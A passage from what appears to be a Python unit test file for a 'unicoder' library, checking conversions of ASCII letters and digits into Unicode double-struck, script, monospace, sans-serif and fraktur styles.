unicoder.double(base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝕒𝕓𝕔𝕕𝕖𝕗𝕘𝕙𝕚𝕛𝕜𝕝𝕞𝕟𝕠𝕡𝕢𝕣𝕤𝕥𝕦𝕧𝕨𝕩𝕪𝕫") def test_207_norm_double(self) -> None: uni = unicoder.double(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝔸𝔹ℂ𝔻𝔼𝔽𝔾ℍ𝕀𝕁𝕂𝕃𝕄ℕ𝕆ℙℚℝ𝕊𝕋𝕌𝕍𝕎𝕏𝕐ℤ") def test_208_norm_double(self) -> None: uni = unicoder.double(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝔸𝔹ℂ𝔻𝔼𝔽𝔾ℍ𝕀𝕁𝕂𝕃𝕄ℕ𝕆ℙℚℝ𝕊𝕋𝕌𝕍𝕎𝕏𝕐ℤ") def test_210_bold_double(self) -> None: uni = unicoder.convert("fix", ":abcxyzABXY") self.assertEqual(uni, ":abcxyzABXY") def test_211_bold_double(self) -> None: uni = unicoder.convert("fatdouble", ":abcxyzABXY") self.assertEqual(uni, ":𝕒𝕓𝕔𝕩𝕪𝕫𝔸𝔹𝕏𝕐") def test_212_bold_double(self) -> None: uni = unicoder.convert("boldwide", ":abcxyzABXY") self.assertEqual(uni, ":𝕒𝕓𝕔𝕩𝕪𝕫𝔸𝔹𝕏𝕐") def test_215_bold_double(self) -> None: uni = unicoder.bold(unicoder.double(":abcxyzABXY")) self.assertEqual(uni, ":𝕒𝕓𝕔𝕩𝕪𝕫𝔸𝔹𝕏𝕐") def test_216_bold_double(self) -> None: uni = unicoder.bold(unicoder.double(":abcxyzABXY")) self.assertEqual(uni, ":𝕒𝕓𝕔𝕩𝕪𝕫𝔸𝔹𝕏𝕐") def test_240_numm_double(self) -> None: uni = unicoder.convert("fix", base_0123456789) self.assertEqual(uni, base_0123456789) def test_241_numm_double(self) -> None: uni = unicoder.convert("double", base_0123456789) self.assertEqual(uni, ":𝟘𝟙𝟚𝟛𝟜𝟝𝟞𝟟𝟠𝟡") def test_242_numm_double(self) -> None: uni = unicoder.convert("wide", base_0123456789) self.assertEqual(uni, ":𝟘𝟙𝟚𝟛𝟜𝟝𝟞𝟟𝟠𝟡") def test_245_numm_double(self) -> None: uni = unicoder.double(base_0123456789) self.assertEqual(uni, ":𝟘𝟙𝟚𝟛𝟜𝟝𝟞𝟟𝟠𝟡") def test_246_numm_double(self) -> None: uni = unicoder.double(base_0123456789) self.assertEqual(uni, ":𝟘𝟙𝟚𝟛𝟜𝟝𝟞𝟟𝟠𝟡") # def test_250_norm_script(self) -> None: uni = unicoder.convert("fix", ":abcxyzABCXYZ") self.assertEqual(uni, ":abcxyzABCXYZ") def test_251_norm_script(self) -> None: uni = unicoder.convert("script", ":abcd-f-hijklmn-pqrstuvwxyz") self.assertEqual(uni, ":𝒶𝒷𝒸𝒹-𝒻-𝒽𝒾𝒿𝓀𝓁𝓂𝓃-𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏") uni = unicoder.convert("script", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝒶𝒷𝒸𝒹ℯ𝒻ℊ𝒽𝒾𝒿𝓀𝓁𝓂𝓃ℴ𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏") def test_252_norm_script(self) -> None: uni = unicoder.convert("round", ":abcd-f-hijklmn-pqrstuvwxyz") self.assertEqual(uni, ":𝒶𝒷𝒸𝒹-𝒻-𝒽𝒾𝒿𝓀𝓁𝓂𝓃-𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏") uni = unicoder.convert("round", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝒶𝒷𝒸𝒹ℯ𝒻ℊ𝒽𝒾𝒿𝓀𝓁𝓂𝓃ℴ𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏") def test_253_norm_script(self) -> None: uni = unicoder.convert("script", ":A-CD--G--JK--NOPQ-STUVWXYZ") self.assertEqual(uni, ":𝒜-𝒞𝒟--𝒢--𝒥𝒦--𝒩𝒪𝒫𝒬-𝒮𝒯𝒰𝒱𝒲𝒳𝒴𝒵") uni = unicoder.convert("script", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝒜ℬ𝒞𝒟ℰℱ𝒢ℋℐ𝒥𝒦ℒℳ𝒩𝒪𝒫𝒬ℛ𝒮𝒯𝒰𝒱𝒲𝒳𝒴𝒵") def test_254_norm_script(self) -> None: uni = unicoder.convert("round", ":A-CD--G--JK--NOPQ-STUVWXYZ") self.assertEqual(uni, ":𝒜-𝒞𝒟--𝒢--𝒥𝒦--𝒩𝒪𝒫𝒬-𝒮𝒯𝒰𝒱𝒲𝒳𝒴𝒵") uni = unicoder.convert("round", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝒜ℬ𝒞𝒟ℰℱ𝒢ℋℐ𝒥𝒦ℒℳ𝒩𝒪𝒫𝒬ℛ𝒮𝒯𝒰𝒱𝒲𝒳𝒴𝒵") def test_255_norm_script(self) -> None: uni = unicoder.script(":abcd-f-hijklmn-pqrstuvwxyz") self.assertEqual(uni, ":𝒶𝒷𝒸𝒹-𝒻-𝒽𝒾𝒿𝓀𝓁𝓂𝓃-𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏") uni = unicoder.script(base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝒶𝒷𝒸𝒹ℯ𝒻ℊ𝒽𝒾𝒿𝓀𝓁𝓂𝓃ℴ𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏") def test_256_norm_script(self) -> None: uni = unicoder.script(":abcd-f-hijklmn-pqrstuvwxyz") self.assertEqual(uni, ":𝒶𝒷𝒸𝒹-𝒻-𝒽𝒾𝒿𝓀𝓁𝓂𝓃-𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏") uni = unicoder.script(base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝒶𝒷𝒸𝒹ℯ𝒻ℊ𝒽𝒾𝒿𝓀𝓁𝓂𝓃ℴ𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏") def test_257_norm_script(self) -> None: uni = unicoder.script(":A-CD--G--JK--NOPQ-STUVWXYZ") self.assertEqual(uni, ":𝒜-𝒞𝒟--𝒢--𝒥𝒦--𝒩𝒪𝒫𝒬-𝒮𝒯𝒰𝒱𝒲𝒳𝒴𝒵") uni = unicoder.script(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝒜ℬ𝒞𝒟ℰℱ𝒢ℋℐ𝒥𝒦ℒℳ𝒩𝒪𝒫𝒬ℛ𝒮𝒯𝒰𝒱𝒲𝒳𝒴𝒵") def test_258_norm_script(self) -> None: uni = unicoder.script(":A-CD--G--JK--NOPQ-STUVWXYZ") self.assertEqual(uni, ":𝒜-𝒞𝒟--𝒢--𝒥𝒦--𝒩𝒪𝒫𝒬-𝒮𝒯𝒰𝒱𝒲𝒳𝒴𝒵") uni = unicoder.script(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝒜ℬ𝒞𝒟ℰℱ𝒢ℋℐ𝒥𝒦ℒℳ𝒩𝒪𝒫𝒬ℛ𝒮𝒯𝒰𝒱𝒲𝒳𝒴𝒵") def test_260_bold_script(self) -> None: uni = unicoder.convert("fix", ":abcxyzABXY") self.assertEqual(uni, ":abcxyzABXY") def test_261_bold_script(self) -> None: uni = unicoder.convert("fatscript", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝓪𝓫𝓬𝓭𝓮𝓯𝓰𝓱𝓲𝓳𝓴𝓵𝓶𝓷𝓸𝓹𝓺𝓻𝓼𝓽𝓾𝓿𝔀𝔁𝔂𝔃") def test_262_bold_script(self) -> None: uni = unicoder.convert("boldround", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝓪𝓫𝓬𝓭𝓮𝓯𝓰𝓱𝓲𝓳𝓴𝓵𝓶𝓷𝓸𝓹𝓺𝓻𝓼𝓽𝓾𝓿𝔀𝔁𝔂𝔃") def test_263_bold_script(self) -> None: uni = unicoder.convert("fatscript", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝓐𝓑𝓒𝓓𝓔𝓕𝓖𝓗𝓘𝓙𝓚𝓛𝓜𝓝𝓞𝓟𝓠𝓡𝓢𝓣𝓤𝓥𝓦𝓧𝓨𝓩") def test_264_bold_script(self) -> None: uni = unicoder.convert("boldround", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝓐𝓑𝓒𝓓𝓔𝓕𝓖𝓗𝓘𝓙𝓚𝓛𝓜𝓝𝓞𝓟𝓠𝓡𝓢𝓣𝓤𝓥𝓦𝓧𝓨𝓩") def test_272_bold_script(self) -> None: uni = unicoder.bold(unicoder.script(base_abcdefghijklmnopqrstuvwxyz)) self.assertEqual(uni, ":𝓪𝓫𝓬𝓭𝓮𝓯𝓰𝓱𝓲𝓳𝓴𝓵𝓶𝓷𝓸𝓹𝓺𝓻𝓼𝓽𝓾𝓿𝔀𝔁𝔂𝔃") def test_273_bold_script(self) -> None: uni = unicoder.bold(unicoder.script(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)) self.assertEqual(uni, ":𝓐𝓑𝓒𝓓𝓔𝓕𝓖𝓗𝓘𝓙𝓚𝓛𝓜𝓝𝓞𝓟𝓠𝓡𝓢𝓣𝓤𝓥𝓦𝓧𝓨𝓩") def test_277_bold_script(self) -> None: uni = unicoder.script(unicoder.bold(base_abcdefghijklmnopqrstuvwxyz)) self.assertEqual(uni, ":𝓪𝓫𝓬𝓭𝓮𝓯𝓰𝓱𝓲𝓳𝓴𝓵𝓶𝓷𝓸𝓹𝓺𝓻𝓼𝓽𝓾𝓿𝔀𝔁𝔂𝔃") def test_278_bold_script(self) -> None: uni = unicoder.script(unicoder.bold(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)) self.assertEqual(uni, ":𝓐𝓑𝓒𝓓𝓔𝓕𝓖𝓗𝓘𝓙𝓚𝓛𝓜𝓝𝓞𝓟𝓠𝓡𝓢𝓣𝓤𝓥𝓦𝓧𝓨𝓩") def test_290_numm_script(self) -> None: uni = unicoder.convert("fix", base_0123456789) self.assertEqual(uni, base_0123456789) def test_291_numm_script(self) -> None: uni = unicoder.convert("script", base_0123456789) self.assertEqual(uni, base_0123456789) def test_292_numm_script(self) -> None: uni = unicoder.convert("round", base_0123456789) self.assertEqual(uni, base_0123456789) def test_295_numm_script(self) -> None: uni = unicoder.script(base_0123456789) self.assertEqual(uni, base_0123456789) def test_296_numm_script(self) -> None: uni = unicoder.script(base_0123456789) self.assertEqual(uni, base_0123456789) # def test_300_norm_courier(self) -> None: uni = unicoder.convert("fix", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, base_abcdefghijklmnopqrstuvwxyz) self.assertNotEqual(base_abcdefghijklmnopqrstuvwxyz, sans_abcdefghijklmnopqrstuvwxyz) self.assertNotEqual(mono_abcdefghijklmnopqrstuvwxyz, sans_abcdefghijklmnopqrstuvwxyz) def test_301_norm_courier(self) -> None: uni = unicoder.convert("courier", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, mono_abcdefghijklmnopqrstuvwxyz) def test_302_norm_courier(self) -> None: uni = unicoder.convert("mono", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, mono_abcdefghijklmnopqrstuvwxyz) def test_303_norm_courier(self) -> None: uni = unicoder.convert("courier", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, mono_ABCDEFGHIJKLMNOPQRSTUVWXYZ) def test_304_norm_courier(self) -> None: uni = unicoder.convert("mono", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, mono_ABCDEFGHIJKLMNOPQRSTUVWXYZ) def test_305_norm_courier(self) -> None: uni = unicoder.courier(base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, mono_abcdefghijklmnopqrstuvwxyz) def test_306_norm_courier(self) -> None: uni = unicoder.courier(base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, mono_abcdefghijklmnopqrstuvwxyz) def test_307_norm_courier(self) -> None: uni = unicoder.courier(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, mono_ABCDEFGHIJKLMNOPQRSTUVWXYZ) def test_308_norm_courier(self) -> None: uni = unicoder.courier(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, mono_ABCDEFGHIJKLMNOPQRSTUVWXYZ) def test_340_numm_courier(self) -> None: uni = unicoder.convert("fix", base_0123456789) self.assertEqual(uni, base_0123456789) def test_341_numm_courier(self) -> None: uni = unicoder.convert("courier", base_0123456789) self.assertEqual(uni, mono_0123456789) def test_342_numm_courier(self) -> None: uni = unicoder.convert("mono", base_0123456789) self.assertEqual(uni, mono_0123456789) def test_345_numm_courier(self) -> None: uni = unicoder.courier(base_0123456789) self.assertEqual(uni, mono_0123456789) def test_346_numm_courier(self) -> None: uni = unicoder.courier(base_0123456789) self.assertEqual(uni, mono_0123456789) def test_350_norm_initial(self) -> None: uni = unicoder.convert("init", "Hello world") self.assertEqual(uni, "ℍello world") def test_351_norm_initial(self) -> None: uni = unicoder.convert("caps", "Hello world") self.assertEqual(uni, "ℍello world") def test_352_norm_initial(self) -> None: uni = unicoder.convert("init", "say Hello world") self.assertEqual(uni, "say ℍello world") def test_353_norm_initial(self) -> None: uni = unicoder.convert("caps", "say Hello world") self.assertEqual(uni, "say ℍello world") def test_354_norm_initial(self) -> None: uni = unicoder.convert("init", "Say Hello world") self.assertEqual(uni, "𝕊ay Hello world") def test_355_norm_initial(self) -> None: uni = unicoder.convert("caps", "Say Hello world") self.assertEqual(uni, "𝕊ay Hello world") def test_360_norm_initial(self) -> None: uni = unicoder.initial("Hello world") self.assertEqual(uni, "ℍello world") def test_361_norm_initial(self) -> None: uni = unicoder.initial("say Hello world") self.assertEqual(uni, "say ℍello world") def test_362_norm_initial(self) -> None: uni = unicoder.initial("Say Hello world") self.assertEqual(uni, "𝕊ay Hello world") def test_363_norm_initial(self) -> None: uni = unicoder.initial("Say Hello world.\nYes, I will do.") self.assertEqual(uni, "𝕊ay Hello world.\n𝕐es, I will do.") # def test_400_norm_sans(self) -> None: uni = unicoder.convert("fix", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, base_abcdefghijklmnopqrstuvwxyz) self.assertNotEqual(base_abcdefghijklmnopqrstuvwxyz, sans_abcdefghijklmnopqrstuvwxyz) self.assertNotEqual(mono_abcdefghijklmnopqrstuvwxyz, sans_abcdefghijklmnopqrstuvwxyz) def test_401_norm_sans(self) -> None: uni = unicoder.convert("sans", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, sans_abcdefghijklmnopqrstuvwxyz) def test_402_norm_sans(self) -> None: uni = unicoder.convert("vect", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, sans_abcdefghijklmnopqrstuvwxyz) def test_403_norm_sans(self) -> None: uni = unicoder.convert("sans", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ) def test_404_norm_sans(self) -> None: uni = unicoder.convert("vect", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ) def test_405_norm_sans(self) -> None: uni = unicoder.sans(base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, sans_abcdefghijklmnopqrstuvwxyz) def test_406_norm_sans(self) -> None: uni = unicoder.sans(base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, sans_abcdefghijklmnopqrstuvwxyz) def test_407_norm_sans(self) -> None: uni = unicoder.sans(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ) def test_408_norm_sans(self) -> None: uni = unicoder.sans(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ) def test_410_numm_sans(self) -> None: uni = unicoder.convert("fix", base_0123456789) self.assertEqual(uni, base_0123456789) def test_411_numm_sans(self) -> None: uni = unicoder.convert("sans", base_0123456789) self.assertEqual(uni, sans_0123456789) def test_412_numm_sans(self) -> None: uni = unicoder.convert("vect", base_0123456789) self.assertEqual(uni, sans_0123456789) def test_415_numm_sans(self) -> None: uni = unicoder.sans(base_0123456789) self.assertEqual(uni, sans_0123456789) def test_416_numm_sans(self) -> None: uni = unicoder.sans(base_0123456789) self.assertEqual(uni, sans_0123456789) def test_421_bold_sans(self) -> None: uni = unicoder.convert("boldsans", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, bold_sans_abcdefghijklmnopqrstuvwxyz) def test_422_bold_sans(self) -> None: uni = unicoder.convert("fatvect", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, bold_sans_abcdefghijklmnopqrstuvwxyz) def test_423_bold_sans(self) -> None: uni = unicoder.convert("boldsans", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, bold_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ) def test_424_bold_sans(self) -> None: uni = unicoder.convert("fatvect", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, bold_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ) def test_425_bold_sans(self) -> None: uni = unicoder.bold(unicoder.sans(base_abcdefghijklmnopqrstuvwxyz)) self.assertEqual(uni, bold_sans_abcdefghijklmnopqrstuvwxyz) def test_426_bold_sans(self) -> None: uni = unicoder.sans(unicoder.bold(base_abcdefghijklmnopqrstuvwxyz)) self.assertEqual(uni, bold_sans_abcdefghijklmnopqrstuvwxyz) def test_427_bold_sans(self) -> None: uni = unicoder.bold(unicoder.sans(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)) self.assertEqual(uni, bold_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ) def test_428_bold_sans(self) -> None: uni = unicoder.sans(unicoder.bold(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)) self.assertEqual(uni, bold_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ) def test_430_numm_bold_sans(self) -> None: uni = unicoder.convert("fix", base_0123456789) self.assertEqual(uni, base_0123456789) def test_431_numm_bold_sans(self) -> None: uni = unicoder.convert("boldsans", base_0123456789) self.assertEqual(uni, bold_sans_0123456789) def test_432_numm_bold_sans(self) -> None: uni = unicoder.convert("fatvect", base_0123456789) self.assertEqual(uni, bold_sans_0123456789) def test_435_numm_bold_sans(self) -> None: uni = unicoder.bold(unicoder.sans(base_0123456789)) self.assertEqual(uni, bold_sans_0123456789) def test_436_numm_bold_sans(self) -> None: uni = unicoder.sans(unicoder.bold(base_0123456789)) self.assertEqual(uni, bold_sans_0123456789) def test_441_ital_sans(self) -> None: uni = unicoder.convert("italsans", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ital_sans_abcdefghijklmnopqrstuvwxyz) def test_442_ital_sans(self) -> None: uni = unicoder.convert("slantvect", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ital_sans_abcdefghijklmnopqrstuvwxyz) def test_443_ital_sans(self) -> None: uni = unicoder.convert("italsans", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ital_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ) def test_444_ital_sans(self) -> None: uni = unicoder.convert("slantvect", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ital_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ) def test_445_ital_sans(self) -> None: uni = unicoder.ital(unicoder.sans(base_abcdefghijklmnopqrstuvwxyz)) self.assertEqual(uni, ital_sans_abcdefghijklmnopqrstuvwxyz) def test_446_ital_sans(self) -> None: uni = unicoder.sans(unicoder.ital(base_abcdefghijklmnopqrstuvwxyz)) self.assertEqual(uni, ital_sans_abcdefghijklmnopqrstuvwxyz) def test_447_ital_sans(self) -> None: uni = unicoder.ital(unicoder.sans(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)) self.assertEqual(uni, ital_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ) def test_448_ital_sans(self) -> None: uni = unicoder.sans(unicoder.ital(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)) self.assertEqual(uni, ital_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ) def test_450_numm_ital_sans(self) -> None: uni = unicoder.convert("fix", base_0123456789) self.assertEqual(uni, base_0123456789) def test_451_numm_ital_sans(self) -> None: uni = unicoder.convert("italsans", base_0123456789) self.assertEqual(uni, ital_sans_0123456789) def test_452_numm_ital_sans(self) -> None: uni = unicoder.convert("slantvect", base_0123456789) self.assertEqual(uni, ital_sans_0123456789) def test_455_numm_ital_sans(self) -> None: uni = unicoder.ital(unicoder.sans(base_0123456789)) self.assertEqual(uni, ital_sans_0123456789) def test_456_numm_ital_sans(self) -> None: uni = unicoder.sans(unicoder.ital(base_0123456789)) self.assertEqual(uni, ital_sans_0123456789) def test_459_numm_ital_sans(self) -> None: self.assertEqual(ital_sans_0123456789, sans_0123456789) def test_461_bold_ital_sans(self) -> None: uni = unicoder.convert("bolditalsans", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, bold_ital_sans_abcdefghijklmnopqrstuvwxyz) def test_462_bold_ital_sans(self) -> None: uni = unicoder.convert("fatslantvect", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, bold_ital_sans_abcdefghijklmnopqrstuvwxyz) def test_463_bold_ital_sans(self) -> None: uni = unicoder.convert("bolditalsans", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, bold_ital_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ) def test_464_bold_ital_sans(self) -> None: uni = unicoder.convert("fatslantvect", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, bold_ital_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ) def test_465_bold_ital_sans(self) -> None: uni = unicoder.bold(unicoder.ital( unicoder.sans(base_abcdefghijklmnopqrstuvwxyz))) self.assertEqual(uni, bold_ital_sans_abcdefghijklmnopqrstuvwxyz) def test_466_bold_ital_sans(self) -> None: uni = unicoder.ital(unicoder.bold( unicoder.sans(base_abcdefghijklmnopqrstuvwxyz))) self.assertEqual(uni, bold_ital_sans_abcdefghijklmnopqrstuvwxyz) def test_467_bold_ital_sans(self) -> None: uni = unicoder.sans( unicoder.bold(unicoder.ital(base_abcdefghijklmnopqrstuvwxyz))) def test_468_bold_ital_sans(self) -> None: uni = unicoder.bold( unicoder.sans(unicoder.ital(base_abcdefghijklmnopqrstuvwxyz))) def test_469_bold_ital_sans(self) -> None: uni = unicoder.ital( unicoder.sans(unicoder.bold(base_abcdefghijklmnopqrstuvwxyz))) def test_470_bold_ital_sans(self) -> None: uni = unicoder.bold(unicoder.ital( unicoder.sans(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ))) self.assertEqual(uni, bold_ital_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ) def test_471_bold_ital_sans(self) -> None: uni = unicoder.ital(unicoder.bold( unicoder.sans(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ))) self.assertEqual(uni, bold_ital_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ) def test_472_bold_ital_sans(self) -> None: uni = unicoder.sans( unicoder.bold(unicoder.ital(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ))) self.assertEqual(uni, bold_ital_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ) def test_473_bold_ital_sans(self) -> None: uni = unicoder.bold( unicoder.sans(unicoder.ital(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ))) self.assertEqual(uni, bold_ital_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ) def test_474_bold_ital_sans(self) -> None: uni = unicoder.ital( unicoder.sans(unicoder.bold(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ))) self.assertEqual(uni, bold_ital_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ) def test_480_numm_bold_ital_sans(self) -> None: uni = unicoder.convert("fix", base_0123456789) self.assertEqual(uni, base_0123456789) def test_481_numm_bold_ital_sans(self) -> None: uni = unicoder.convert("bolditalsans", base_0123456789) self.assertEqual(uni, bold_ital_sans_0123456789) def test_482_numm_bold_ital_sans(self) -> None: uni = unicoder.convert("fatslantvect", base_0123456789) self.assertEqual(uni, bold_ital_sans_0123456789) def test_485_numm_bold_ital_sans(self) -> None: uni = unicoder.bold(unicoder.ital(unicoder.sans(base_0123456789))) self.assertEqual(uni, bold_ital_sans_0123456789) def test_486_numm_bold_ital_sans(self) -> None: uni = unicoder.sans(unicoder.bold(unicoder.ital(base_0123456789))) self.assertEqual(uni, bold_ital_sans_0123456789) def test_489_numm_bold_ital_sans(self) -> None: self.assertEqual(bold_ital_sans_0123456789, bold_sans_0123456789) # def test_500_norm_frak(self) -> None: uni = unicoder.convert("fix", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, base_abcdefghijklmnopqrstuvwxyz) def test_501_norm_frak(self) -> None: uni = unicoder.convert("frak", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝔞𝔟𝔠𝔡𝔢𝔣𝔤𝔥𝔦𝔧𝔨𝔩𝔪𝔫𝔬𝔭𝔮𝔯𝔰𝔱𝔲𝔳𝔴𝔵𝔶𝔷") def test_502_norm_frak(self) -> None: uni = unicoder.convert("black", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝔞𝔟𝔠𝔡𝔢𝔣𝔤𝔥𝔦𝔧𝔨𝔩𝔪𝔫𝔬𝔭𝔮𝔯𝔰𝔱𝔲𝔳𝔴𝔵𝔶𝔷") def test_503_norm_frak(self) -> None: uni = unicoder.convert("frak", ":AB-DEFG--JKLMNOPQ-STUVWXY-") self.assertEqual(uni, ":𝔄𝔅-𝔇𝔈𝔉𝔊--𝔍𝔎𝔏𝔐𝔑𝔒𝔓𝔔-𝔖𝔗𝔘𝔙𝔚𝔛𝔜-") uni = unicoder.convert("frak", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝔄𝔅ℭ𝔇𝔈𝔉𝔊ℌℑ𝔍𝔎𝔏𝔐𝔑𝔒𝔓𝔔ℜ𝔖𝔗𝔘𝔙𝔚𝔛𝔜ℨ") def test_504_norm_frak(self) -> None: uni = unicoder.convert("black", ":AB-DEFG--JKLMNOPQ-STUVWXY-") self.assertEqual(uni, ":𝔄𝔅-𝔇𝔈𝔉𝔊--𝔍𝔎𝔏𝔐𝔑𝔒𝔓𝔔-𝔖𝔗𝔘𝔙𝔚𝔛𝔜-") uni = unicoder.convert("black", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝔄𝔅ℭ𝔇𝔈𝔉𝔊ℌℑ𝔍𝔎𝔏𝔐𝔑𝔒𝔓𝔔ℜ𝔖𝔗𝔘𝔙𝔚𝔛𝔜ℨ") def test_505_norm_frak(self) -> None: uni = unicoder.fraktur(base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝔞𝔟𝔠𝔡𝔢𝔣𝔤𝔥𝔦𝔧𝔨𝔩𝔪𝔫𝔬𝔭𝔮𝔯𝔰𝔱𝔲𝔳𝔴𝔵𝔶𝔷") def test_506_norm_frak(self) -> None: uni = unicoder.fraktur(base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝔞𝔟𝔠𝔡𝔢𝔣𝔤𝔥𝔦𝔧𝔨𝔩𝔪𝔫𝔬𝔭𝔮𝔯𝔰𝔱𝔲𝔳𝔴𝔵𝔶𝔷") def test_507_norm_frak(self) -> None: uni = unicoder.fraktur(":AB-DEFG--JKLMNOPQ-STUVWXY-") self.assertEqual(uni, ":𝔄𝔅-𝔇𝔈𝔉𝔊--𝔍𝔎𝔏𝔐𝔑𝔒𝔓𝔔-𝔖𝔗𝔘𝔙𝔚𝔛𝔜-") def test_508_norm_frak(self) -> None: uni = unicoder.fraktur(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝔄𝔅ℭ𝔇𝔈𝔉𝔊ℌℑ𝔍𝔎𝔏𝔐𝔑𝔒𝔓𝔔ℜ𝔖𝔗𝔘𝔙𝔚𝔛𝔜ℨ") def test_510_bold_frak(self) -> None: uni = unicoder.convert("fix", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, base_abcdefghijklmnopqrstuvwxyz) def test_511_bold_frak(self) -> None: uni = unicoder.convert("boldfrak", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝖆𝖇𝖈𝖉𝖊𝖋𝖌𝖍𝖎𝖏𝖐𝖑𝖒𝖓𝖔𝖕𝖖𝖗𝖘𝖙𝖚𝖛𝖜𝖝𝖞𝖟") def test_512_bold_frak(self) -> None: uni = unicoder.convert("boldblack", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, 